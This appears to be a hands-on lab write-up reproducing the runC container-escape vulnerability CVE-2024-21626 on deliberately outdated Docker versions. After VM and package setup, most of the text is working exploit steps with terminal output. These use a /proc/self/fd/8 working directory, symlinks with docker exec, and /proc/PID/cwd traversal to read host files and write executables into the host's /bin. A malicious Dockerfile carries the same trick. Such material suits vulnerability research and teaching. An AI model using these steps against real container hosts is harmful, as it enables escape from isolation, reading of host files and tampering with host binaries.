Read my full article for detailed explanation here.
While investigating CVE-2024–21626, I discovered an overlooked vulnerability in older versions of Docker and runC. To learn more about what I found, read the following article: “Exploring Hidden Vulnerabilities in Legacy Docker Versions: Lessons from CVE-2024–21626”.
During the installation do not check the box to download update system.
-
insert Guest additions CD image
-
open terminal in the mounted CD image
-
run the VBoxLinuxAdditions.run script
demo@demo-pc:/media/demo/VBox_GAs_7.0.14$ sudo ./VBoxLinuxAdditions.run
-
Set up Docker's apt repository
# set up Docker's apt repository: add Docker's official GPG key: sudo apt update sudo apt install ca-certificates curl sudo install -m 0755 -d /etc/apt/keyrings sudo curl -fsSL https://download.docker.com/linux/ubuntu/gpg -o /etc/apt/keyrings/docker.asc sudo chmod a+r /etc/apt/keyrings/docker.asc # add the repository to Apt sources: echo \ "deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.asc] https://download.docker.com/linux/ubuntu \ $(. /etc/os-release && echo "$VERSION_CODENAME") stable" | \ sudo tee /etc/apt/sources.list.d/docker.list > /dev/null sudo apt update
-
Find and install the right version of the different components (docker-ce, docker-ce-cli, containerd.io, docker-buildx-plugin).
# search in the cache reposiroty the docker-ce available packages apt-cache madison docker-ce | awk '{ print $3 }' # setup the chosen version VERSION_STRING=5:24.0.6-1~ubuntu.22.04~jammy # search in the cache reposiroty the containerd.io and docker-buildx-plugin available packages apt-cache madison containerd.io | awk '{ print $3 }' apt-cache madison docker-buildx-plugin | awk '{ print $3 }'docker-buildx-plugin # install the packages sudo apt install docker-ce=$VERSION_STRING \ docker-ce-cli=$VERSION_STRING \ containerd.io=1.6.4-1 \ docker-buildx-plugin=0.10.2-1~ubuntu.22.04~jammy
If the packages are too old to find (see also the old repository online), or if you can't use Docker's apt repository to install Docker Engine, you can download the deb file for your release and install it manually. Go to https://download.docker.com/linux/ubuntu/dists/ or use the deb files inside the my GitHub repository and install them.
# clone CVE-2024-21626 repository
git clone [email protected]:Sk3pper/CVE-2024-21626.git
# install deb files
cd CVE-2024-21626/deb
sudo dpkg -i ./containerd.io_1.6.4-1_amd64.deb \
./docker-ce_24.0.6-1~ubuntu.22.04~jammy_amd64.deb \
./docker-ce-cli_24.0.6-1~ubuntu.22.04~jammy_amd64.deb \
./docker-buildx-plugin_0.10.2-1~ubuntu.22.04~jammy_amd64.debsudo docker version
runc --version
containerd --version
uname -rTo work properly the vulnerability needs the presence of openat2 syscall. Manually checking with the following command:
grep openat2 /proc/kallsyms There could be cases where it is necessary to check with the following golang script available in my GitHub repository if the openat2 syscall is present.
# clone CVE-2024-21626 repository
git clone [email protected]:Sk3pper/CVE-2024-21626.git
# run testOpenat2
cd testOpenat2
./testOpenat2
The unix.Openat2 syscall is present on this system.The binary found was build with the following flags
env GOOS=linux GOARCH=amd64 go build testOpenat2.goRun checkVulnerability.sh and see if the file is printed in the the terminal
# clone CVE-2024-21626 repository
git clone [email protected]:Sk3pper/CVE-2024-21626.git
# run checkVulnerability.sh
chmod +x checkVulnerability.sh
./checkVulnerability.shExploit via Setting Working Directory to /proc/self/fd/
# run container with working directory to /proc/self/fd/8
sudo docker run -w /proc/self/fd/8 --name cve-2024-21626 --rm -it debian:bookworm
# read host filesystem files inside the container
root@c4c0a9c99be6:.# cat ../../../../../../../../../../../etc/hostname
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
demo-pc
Exploit via docker exec:
Open one terminal and execute the following commands
# terminal 1
# run container
demo@demo-pc:~$ sudo docker run --name cve-2024-21626 --rm -it debian:bookworm
# create symlinks
root@d98de5a852d7:/# ln -sf /proc/self/fd/8/ /foo
root@d98de5a852d7:/# ln -sf /proc/self/fd/8/ /barOpen another terminal and run the following command
# terminal 2: exec inside the container and set working directory
sudo docker exec -it -w /bar cve-2024-21626 sleep 120Come back to the first terminal and access to the host path filesystem
# terminal 1: find actula pid with the right cmdline
root@d98de5a852d7:/# ls -f /proc
. irq kmsg kcore mdstat cpuinfo sysvipc softirqs bootconfig execdomains sysrq-trigger 15
.. net misc locks mounts devices version zoneinfo interrupts filesystems version_signature
fb sys mtrr swaps uptime ioports consoles buddyinfo kpagecount kpagecgroup self
fs tty scsi asound vmstat loadavg kallsyms diskstats kpageflags vmallocinfo thread-self
bus acpi stat crypto cgroups meminfo pressure key-users partitions pagetypeinfo 1
dma keys iomem driver cmdline modules slabinfo schedstat timer_list dynamic_debug 9
root@d98de5a852d7:/# cat /proc/9/cmdline
sleep120
# read host filesystem files
root@d98de5a852d7:/# cat /proc/9/cwd/../../../../../../../../../etc/hostname
demo-pc
# read container filesystem files
root@d98de5a852d7:/# cat /etc/hostname
d98de5a852d7
# Attack 3a is attack 1 but adapted to overwrite a host binary
# run container with the working direcotry to /proc/self/fd/8
sudo docker run -w /proc/self/fd/8 --name cve-2024-21626 --rm -it debian:bookworm
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
root@e5b0730af51d:.#
# write file in the host container
root@b6873018a7e8:.# cat > ../../../../../../../../bin/cve2024_21626 << EOF
#!/bin/bash
echo "Hello CVE-2024-21626"
EOF
# change chmod
root@b6873018a7e8:.# ../../../../../bin/chmod +x ../../../../bin/cve2024_21626
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
# check if the file is present in the host
demo@demo-pc:/bin$ ls -la | grep cve
-rwxr-xr-x 1 root root 40 mar 7 13:24 cve2024_21626
# try it in the host
demo@demo-pc:/bin$ sudo ./cve2024_21626
Hello CVE-2024-21626
# scenario 3b: host binary overwrite attack
# Attack 3b is attack 2 but adapted to overwrite a host binary
# terminal 1
# run container
sudo docker run --name cve-2024-21626 --rm -it debian:bookworm
# create symlinks
root@d98de5a852d7:/# ln -sf /proc/self/fd/8/ /foo
root@d98de5a852d7:/# ln -sf /proc/self/fd/8/ /bar
# terminal 2: exec inside the container and set working directory
sudo docker exec -it -w /bar cve-2024-21626 sleep 1000
# terminal 1
# find actula pid with the right cmdline
root@d98de5a852d7:/# ls -f /proc
. irq kmsg kcore mdstat cpuinfo sysvipc softirqs bootconfig execdomains sysrq-trigger 15
.. net misc locks mounts devices version zoneinfo interrupts filesystems version_signature
fb sys mtrr swaps uptime ioports consoles buddyinfo kpagecount kpagecgroup self
fs tty scsi asound vmstat loadavg kallsyms diskstats kpageflags vmallocinfo thread-self
bus acpi stat crypto cgroups meminfo pressure key-users partitions pagetypeinfo 1
dma keys iomem driver cmdline modules slabinfo schedstat timer_list dynamic_debug 9
root@d98de5a852d7:/# cat /proc/9/cmdline
sleep120
# write file in the host container
root@b6873018a7e8:.# cat > /proc/8/cwd/../../../../bin/cve2024_21626 << EOF
#!/bin/bash
echo "Hello CVE-2024-21626"
EOF
# change chmod
root@b6873018a7e8:.# /proc/8/cwd/../../../../bin/chmod +x \
/proc/8/cwd/../../../../bin/cve2024_21626
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
# check if the file is present in the host
demo@demo-pc:/bin$ ls -la | grep cve
-rwxr-xr-x 1 root root 40 mar 7 13:39 cve2024_21626
# try it in the host
demo@demo-pc:/bin$ sudo ./cve2024_21626
Hello CVE-2024-21626Given the followinf Dockerfile
FROM ubuntu:20.04
RUN apt-get update -y && apt-get install netcat -y
WORKDIR /proc/self/fd/8Build and run the image
sudo docker build . -t devil-image
sudo docker run -it --rm devil-image bash
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
root@415a2e1f079f:.# cat ../../../../../etc/hostname
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
demo-pc